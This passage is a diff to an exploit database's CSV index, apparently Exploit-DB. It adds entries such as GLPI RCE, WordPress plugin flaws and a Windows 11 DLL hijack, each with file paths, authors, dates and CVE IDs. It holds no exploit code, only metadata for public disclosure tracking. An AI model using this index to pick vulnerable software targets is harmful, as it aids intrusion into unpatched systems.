Fantastic",webapps,php,,2017-04-13,2019-03-28,0,,,,,,https://github.com/HackerFantastic/Public/blob/9a2eaaab7d8ea74afeb45703db106b2c0ab47fba/exploits/cpg15x-dirtraversal.txt 37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54115/info 22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",webapps,php,,2003-04-07,2012-11-12,1,OSVDB-50624,,,,,https://www.securityfocus.com/bid/7300/info @@ -16407,7 +16419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,, 31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info -51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,, +51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-10-09,0,CVE-2023-37759,,,,, 32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info 27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info 31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info @@ -19162,6 +19174,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, +51726,exploits/php/webapps/51726.py,"GLPI GZIP(Py3) 9.4.5 - RCE",2023-10-09,"Brian Peters",webapps,php,,2023-10-09,2023-10-09,0,CVE-2020-11060,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, 34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html 34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html @@ -22489,6 +22502,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",webapps,php,,2010-02-15,,0,OSVDB-62389;CVE-2010-0709,,,,, 34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php,,2010-06-24,2014-07-29,1,,,,,,https://www.securityfocus.com/bid/41152/info 36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5343;OSVDB-78093,,,,,https://www.securityfocus.com/bid/51261/info +51744,exploits/php/webapps/51744.txt,"Limo Booking Software v1.0 - CORS",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,, 38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,,2013-11-17,2015-11-30,1,OSVDB-99993,,,,,https://www.securityfocus.com/bid/63771/info 34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",webapps,php,,2009-07-08,2014-09-29,1,CVE-2009-2442;OSVDB-55741,,,,,https://www.securityfocus.com/bid/43711/info 10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,, @@ -23149,6 +23163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,,2020-10-12,2020-10-12,0,,,,,, 45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80,2018-09-07,2018-09-07,0,,"SQL Injection (SQLi)",,,, 3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,,1,OSVDB-36239;CVE-2007-2706,,,,, +51737,exploits/php/webapps/51737.txt,"Media Library Assistant Wordpress Plugin - RCE and LFI",2023-10-09,"Florent MONTEL",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4634,,,,, 41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,, 12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,1,OSVDB-63842,,,,, 17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",webapps,php,,2011-05-16,2011-05-16,1,,,,,, @@ -24781,6 +24796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,, 49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,,2021-01-13,2021-01-13,0,,,,,, 49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,, +51728,exploits/php/webapps/51728.txt,"Online ID Generator 1.0 - Remote Code Execution (RCE)",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,, 49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,,2021-02-16,2021-02-16,0,,,,,, 47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-11-29,2019-11-29,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comonline-inventory-manager-3.2.zip, 42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php,,2017-09-07,2017-09-07,0,,,,,, @@ -29378,6 +29394,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,webapps,php,,2007-04-16,2011-04-27,1,OSVDB-34999;CVE-2007-2141,,,,http://www.exploit-db.comShoutPro1.5.2.zip, 50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Akshay Ravi",webapps,php,,2022-05-17,2022-05-24,0,CVE-2022-0967,,,,, 8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,webapps,php,,2009-05-13,,1,OSVDB-54503;CVE-2009-1650,,,,, +51745,exploits/php/webapps/51745.txt,"Shuttle-Booking-Software v1.0 - Multiple-SQLi",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,, 45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comSiAdmin-1.1.zip, 36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,webapps,php,,2012-01-01,2015-03-25,1,,,,,,https://www.securityfocus.com/bid/51218/info 12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,webapps,php,,2010-04-15,,1,OSVDB-63837;CVE-2010-1711;OSVDB-63836;CVE-2010-1710,,,,, @@ -32151,6 +32168,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz, +51743,exploits/php/webapps/51743.txt,"Webedition CMS v2.9.8.8 - Blind SSRF",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,, 51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,, 51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,, 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip, @@ -32206,6 +32224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,, 19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip, 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,, +51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,, 51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,, 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,, 46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip, @@ -33177,6 +33196,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",webapps,php,,2015-03-24,2015-03-24,0,CVE-2014-9014;CVE-2014-9013;OSVDB-115631,,,,, 36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",webapps,php,,2015-03-25,2016-10-27,0,CVE-2014-9014;OSVDB-115631;CVE-2014-9013,,,,, 18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php,,2012-06-05,2012-06-05,1,OSVDB-81143,"WordPress Plugin",,,http://www.exploit-db.comwpmarketplace.zip, +51735,exploits/php/webapps/51735.py,"Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation",2023-10-09,"Revan Arifio",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4278,,,,, 50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",2022-02-18,"numan türle",webapps,php,,2022-02-18,2022-02-18,0,CVE-2022-0441,,,,, 24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",webapps,php,,2013-03-26,2013-03-26,1,OSVDB-91737,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-26-at-105329-am.png,, 37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",webapps,php,80,2015-08-21,2015-08-21,0,CVE-2015-6805;OSVDB-126598,"WordPress Plugin",,,http://www.exploit-db.commdc-private-message.zip, @@ -33810,6 +33830,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info 37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,, 17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip, +51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,, 49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,, 34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,, 38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,webapps,php,,2013-06-09,2015-10-30,1,,,,,,https://www.securityfocus.com/bid/60458/info @@ -40772,6 +40793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,, 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817 +51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,, 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,